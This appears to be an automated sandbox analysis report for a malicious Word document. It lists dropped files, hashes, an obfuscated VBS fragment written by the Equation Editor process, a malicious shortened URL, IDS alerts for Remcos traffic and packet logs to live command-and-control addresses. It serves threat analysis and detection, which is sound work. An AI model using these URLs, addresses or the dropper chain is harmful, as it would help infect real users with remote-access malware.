                                        SHA-256:DF3A97C79B707E716B99A2FA9D6E380EBE2B53FEE6964DAA01A50BA3E759B2E0
                                        SHA-512:32A56511CE604C9AB8B2AFA693358E2CD568EB7B82E70636BD265C89B44C6ABFCE705C14C540777DAD647AC5D50717E07AAEBF53C9C879D9F14C3F13F7D6673A
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=http://zeep.ly/rXgoN..

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\xrrwwstCMd.LNK

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Sep 9 14:34:20 2024, length=188247, window=hide
                                        Category:dropped
                                        Size (bytes):1019
                                        Entropy (8bit):4.555352756792704
                                        Encrypted:false
                                        SSDEEP:12:8ly80gXg/XAlCPCHaX4BfB/BGFX+W2oNGzjuicvbL4izNDtZ3YilMMEpxRljKzqB:8Rk/XTIRbk4rXNePRDv3qm157u
                                        MD5:EA1C842A2B523E8F89191B6B51FE2D3C
                                        SHA1:EF5E3BF37A71232331BCC2265CD46D500CF957D2
                                        SHA-256:D76693054B3BD794526B9C54E67C1F70C928FF1CEBD5E1AECC98EDCA3079C131
                                        SHA-512:8EE5CD1647FC2B90439F1525F151C8644E14DEB74CBB34616B2E420F913A5D4B9D8FB3BE8A9BFC35D6E6924C494459815967D3FF874B3043AC8A5C860F86774C
                                        Malicious:false
                                        Preview:L..................F.... .......r.......r...o.[.....W............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....)YH|..user.8......QK.X)YH|*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.W...)YK| .XRRWWS~1.DOC..L.......WD..WD.*.........................x.r.r.w.w.s.t.C.M.d...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\xrrwwstCMd.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.x.r.r.w.w.s.t.C.M.d...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\42CX9VIK.txt

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):71
                                        Entropy (8bit):4.125159838940989
                                        Encrypted:false
                                        SSDEEP:3:X6RSj2u0jNHXQgQW7X33cC:qRc2VjV8WT3r
                                        MD5:0F4BA16B5A6F84E18C048BBDB788EBA5
                                        SHA1:44BED38B7591753FBE852B6A5AFFF9F1B29009C1
                                        SHA-256:9F5373E32CA101BDD224AF1FFB8381EC8BCAFAA65AC4316498075E9E570E5B1C
                                        SHA-512:600BD2A897A3516D8F7FCA963FF3501D3D0881906210E4A32A5DEF6FB0F95E9DC2573EE6692ECFD5035A6F936D7377BE559D5C2CB43214661D80B4350EB6DB78
                                        Malicious:false
                                        Preview:short_478563.1.zeep.ly/.9728.3700952576.31130319.3290984997.31130317.*.

                                        C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):195478
                                        Entropy (8bit):3.8654176042193766
                                        Encrypted:false
                                        SSDEEP:3072:ElIR9Mt8PiEZZNdYogt5pNGwdBiLYXnKO81LZh+Ukf9IV:kU9Mt8PNNdYxXKv1h+U7V
                                        MD5:9C60CEE4860F1FB648D10AA19522CA83
                                        SHA1:592F4BC6EF04AFB622541DD0305272FD9A8B8100
                                        SHA-256:36083400B2237AAEC532B29FEE51CAD3CF82F4B32816716256B4A9718D118DDC
                                        SHA-512:3E349809E5EA1ABA37277B5F745AC3C45A1D375A57F4652543949334D1FFD44A5B0A62352D8B1BA9922E9A295FBD8B7C3D60BB01C91E138F0C86924DCBCE4D2C
                                        Malicious:true
                                        Preview:..N.o.A.h.Q.a.d.i.s.e.W.A. .=. .".A.Z.e.O.P.h.K.t.L.Z.O.O.".....t.i.W.d.k.n.e.K.Z.e.U.K. .=. .".d.L.i.k.f.G.L.W.k.u.e.g.".....f.O.z.q.N.K.A.z.K.A.U.Z. .=. .".n.j.m.W.W.l.R.C.K.c.K.O.".....c.k.f.l.s.O.K.q.p.f.c.f. .=. .".i.O.t.v.P.K.o.z.k.p.R.o.".....W.n.h.b.N.c.K.Z.I.I.O.i. .=. .".U.e.x.K.c.C.m.G.u.a.b.o.".....e.G.m.s.q.f.v.Q.u.L.q.B. .=. .".b.W.N.u.k.O.v.K.U.h.C.k.".....O.k.s.L.d.W.R.G.C.j.P.L. .=. .".G.K.U.i.s.f.L.L.i.A.c.q.".....j.z.l.O.O.o.l.W.U.f.A.W. .=. .".R.p.K.U.f.o.m.c.b.x.G.o.".....G.k.i.e.j.e.m.j.r.d.L.b. .=. .".A.p.q.h.m.d.Z.A.c.c.r.U.".....x.H.i.L.t.S.P.K.f.W.W.f. .=. .".p.z.B.W.J.t.N.m.m.m.t.x.".........Z.i.r.R.f.G.c.J.P.W.W.c. .=. .".W.G.a.G.c.C.A.L.d.L.m.W.".....o.A.i.U.g.r.f.Z.z.n.W.O. .=. .".i.B.B.R.t.s.d.m.i.W.W.c.".....K.i.x.r.W.d.S.Z.I.L.L.L. .=. .".A.v.m.e.c.n.f.p.u.z.P.U.".....n.K.O.c.o.u.k.u.B.R.l.n. .=. .".i.G.m.i.P.o.m.L.N.C.U.Z.".....Z.T.b.A.g.h.I.N.C.j.L.H. .=. .".d.d.i.L.K.K.R.L.k.t.H.b.".....U.G.W.W.N.U.t.k.A.L.U.P. .=. .".L.e.W.d.x.W.K.N.W.N.n.W.".....s.

                                        C:\Users\user\Desktop\xrrwwstCMd.docx (copy)

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):228617
                                        Entropy (8bit):7.9712693292003545
                                        Encrypted:false
                                        SSDEEP:6144:bl7Sa7CFQvpPA+X3JWRFhPRxOIrHFIwyIFdswux53l:bl7N7MQ6+XIRzvOyhkx51
                                        MD5:48CBE4BEFDE136E6383354AE4AECD99A
                                        SHA1:862E5883F56993CA978018802D648BA31EE75DD1
                                        SHA-256:1EDE58809193E28A4139F6C6E6F4E508B46F13F56CF8A4EDF44B883E23EAE1A3
                                        SHA-512:2F6D659A6C82C1B3774BF3511EA8C9663BE26DCF640F3B5995DA333781B7C7FC1BE29779018F5FCCAE508364D49476813F6E06231F0FC99E827F391A0D6E28C0
                                        Malicious:true
                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.

                                        C:\Users\user\Desktop\~$rwwstCMd.docx

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        C:\Users\user\Desktop\~WRD0000.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):228617
                                        Entropy (8bit):7.9712693292003545
                                        Encrypted:false
                                        SSDEEP:6144:bl7Sa7CFQvpPA+X3JWRFhPRxOIrHFIwyIFdswux53l:bl7N7MQ6+XIRzvOyhkx51
                                        MD5:48CBE4BEFDE136E6383354AE4AECD99A
                                        SHA1:862E5883F56993CA978018802D648BA31EE75DD1
                                        SHA-256:1EDE58809193E28A4139F6C6E6F4E508B46F13F56CF8A4EDF44B883E23EAE1A3
                                        SHA-512:2F6D659A6C82C1B3774BF3511EA8C9663BE26DCF640F3B5995DA333781B7C7FC1BE29779018F5FCCAE508364D49476813F6E06231F0FC99E827F391A0D6E28C0
                                        Malicious:false
                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.

                                        C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:Microsoft Word 2007+
                                        Entropy (8bit):7.983436854090507
                                        TrID:
                                        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                        • ZIP compressed archive (8000/1) 9.41%
                                        File name:xrrwwstCMd.docx
                                        File size:188'247 bytes
                                        MD5:7a26583595ab1c59cba058c4327335ed
                                        SHA1:a745152360c26a93aa72b4e7bd0b1f69a91226af
                                        SHA256:f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76
                                        SHA512:a7d4b521cdd98b79d529a0eccaa1b8e4cf04f921b14ef7a62d882232cff5e45dca8883017d8f41644ee9763e335f4d0e17e06b7d53cd9ade0e606b5196fa1d72
                                        SSDEEP:3072:UFDHPsF7pVUyYtbAixTyDpAmMXZt4r6/4mS6UoxynXG1wk3l3hg4BtxChXOIPCr2:Ud0lpayYtfMSPXLLjS6UtXG1wk9wbrt
                                        TLSH:EB040281E949411AC1810773A805BECEDB575E73C29718D7A2B0CFDE1AB61DFAB0386D
                                        File Content Preview:PK.........Y)Ys"P)............[Content_Types].xmlUT...E..fE..fE..f.V.N.0.._....E.[...j.....n.......d.....7.B..B....9.1s.vF..k...I{W.a5`.8..v..=Ln.sV$.N....l..]....&... .K5.#...'9.+R..8Zi|...5.x..I.....g\z........;2....^D...t....7.....":V\..,]3...R ../N}.-

                                        File Icon

                                        Icon Hash:65e6a3a3afb7bdbf

                                        Static OLE Info

                                        General

                                        Document Type:OpenXML
                                        Number of OLE Files:1

                                        OLE File "xrrwwstCMd.docx"

                                        Indicators
                                        Has Summary Info:
                                        Application Name:
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:False
                                        Summary
                                        Title:
                                        Subject:
                                        Author:91974
                                        Keywords:
                                        Template:Normal.dotm
                                        Last Saved By:91974
                                        Revion Number:2
                                        Total Edit Time:1
                                        Create Time:2024-09-04T15:50:00Z
                                        Last Saved Time:2024-09-04T15:51:00Z
                                        Number of Pages:1
                                        Number of Words:0
                                        Number of Characters:0
                                        Creating Application:Microsoft Office Word
                                        Security:0
                                        Document Summary
                                        Number of Lines:1
                                        Number of Paragraphs:1
                                        Thumbnail Scaling Desired:false
                                        Company:Grizli777
                                        Contains Dirty Links:false
                                        Shared Document:false
                                        Changed Hyperlinks:false
                                        Application Version:12.0000

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 94
                                        General
                                        Stream Path:\x1CompObj
                                        CLSID:
                                        File Type:data
                                        Stream Size:94
                                        Entropy:4.345966460061678
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                        General
                                        Stream Path:\x1Ole
                                        CLSID:
                                        File Type:data
                                        Stream Size:20
                                        Entropy:0.5689955935892812
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Stream Path: \x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 1504468
                                        General
                                        Stream Path:\x3EPRINT
                                        CLSID:
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Stream Size:1504468
                                        Entropy:0.9492057268722054
                                        Base64 Encoded:True
                                        Data ASCII:. . . . l . . . . . . . . . . . I . . . R . . . . . . . . . . . : . . ) . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . ) . . . . . . . . . . J . . . S . . . Q . . . . . . . . . . . . . . I . . . R . . . . . . . . . . . . . . . . . . . J . . . S . . . P . . . ( . . . x . . . . . . . . . . . : . . ) . . ( . . . J . . . S . . . . . . . . . . . . . . . .
                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 49 03 00 00 52 02 00 00 00 00 00 00 00 00 00 00 ed 3a 00 00 bf 29 00 00 20 45 4d 46 00 00 01 00 d4 f4 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                        Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                                        General
                                        Stream Path:\x3ObjInfo
                                        CLSID:
                                        File Type:data
                                        Stream Size:6
                                        Entropy:1.2516291673878228
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . .
                                        Data Raw:00 00 03 00 0d 00
                                        Stream Path: CONTENTS, File Type: PDF document, version 1.7, 2 pages, Stream Size: 61942
                                        General
                                        Stream Path:CONTENTS
                                        CLSID:
                                        File Type:PDF document, version 1.7, 2 pages
                                        Stream Size:61942
                                        Entropy:7.956770725678564
                                        Base64 Encoded:True
                                        Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / P a g e M o d e / U s e N o n e . / V i e w e r P r e f e r e n c e s < < . / F i t W i n d o w t r u e . / P a g e L a y o u t / S i n g l e P a g e . / N o n F u l l S c r e e n P a g e M o d e / U s e N o n e . > > . > > . e n d o b j . 5 0 o b j . < < . / L e n g t h 2 8 2 1 . / F i l t e r [ / F l a t e D e c o d e ] . > > . s t r e a m . x Y
                                        Data Raw:25 50 44 46 2d 31 2e 37 20 0a 25 e2 e3 cf d3 20 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 20 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 0a 2f 50 61 67 65 73 20 32 20 30 20 52 20 0a 2f 50 61 67 65 4d 6f 64 65 20 2f 55 73 65 4e 6f 6e 65 20 0a 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 3c 3c 20 0a 2f 46 69 74 57 69 6e 64 6f 77 20 74 72 75 65 20 0a 2f 50 61 67 65 4c 61 79

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-09T17:34:41.212366+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.96443192.168.2.2249170TCP
                                        2024-09-09T17:34:42.017603+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1185.239.241.18480192.168.2.2249171TCP
                                        2024-09-09T17:34:42.017603+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1185.239.241.18480192.168.2.2249171TCP
                                        2024-09-09T17:34:43.502450+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917245.89.247.652201TCP
                                        2024-09-09T17:34:44.930337+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249174178.237.33.5080TCP
                                        2024-09-09T17:34:45.019371+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917345.89.247.652201TCP
                                        2024-09-09T17:35:19.102190+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917545.89.247.652201TCP
                                        2024-09-09T17:35:19.260059+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917645.89.247.652201TCP
                                        2024-09-09T17:35:23.687948+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917745.89.247.652201TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 9, 2024 17:34:23.304508924 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:23.309369087 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:23.309463024 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:23.309561014 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:23.314362049 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:23.969957113 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:23.970211029 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.289424896 CEST4916280192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.294397116 CEST804916295.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:24.294502020 CEST4916280192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.295125008 CEST4916280192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.299977064 CEST804916295.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:24.972798109 CEST804916295.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:24.974925995 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.974965096 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:24.975014925 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.976788998 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:24.976797104 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:25.183660030 CEST4916280192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:25.187197924 CEST804916295.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:25.187247992 CEST4916280192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:25.670115948 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:25.670329094 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:25.675405025 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:25.675415993 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:25.675703049 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:25.752809048 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:25.795422077 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:26.016709089 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:26.016849995 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:26.016904116 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:26.017636061 CEST49163443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:26.017656088 CEST4434916395.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:29.224389076 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.230214119 CEST804916495.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:29.230281115 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.230367899 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.239844084 CEST804916495.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:29.909708977 CEST804916495.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:29.910393953 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.910455942 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:29.910526037 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.911240101 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:29.911259890 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:30.113308907 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:30.741848946 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:30.742010117 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:30.747756958 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:30.747797966 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:30.748030901 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:30.763539076 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:30.807404041 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.077253103 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.077313900 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.077450991 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.077464104 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.077508926 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.078193903 CEST49165443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.078216076 CEST4434916595.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.117149115 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.122235060 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.321489096 CEST804916195.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.321681976 CEST4916180192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.328511953 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.328573942 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:31.328634977 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.330502987 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:31.330534935 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.008097887 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.008272886 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.012840033 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.012849092 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.013195992 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.013238907 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.022670984 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.063396931 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.435931921 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.436053991 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.436084986 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.436144114 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.436146021 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.436196089 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.437361002 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.437378883 CEST4434916695.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:32.437402964 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.437427998 CEST49166443192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:32.469229937 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.474293947 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.474358082 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.474431038 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.479300976 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977746964 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977777958 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977803946 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977821112 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977834940 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977850914 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977850914 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.977869987 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:32.977895021 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.977895021 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.977905989 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:32.977948904 CEST804916785.239.241.184192.168.2.22
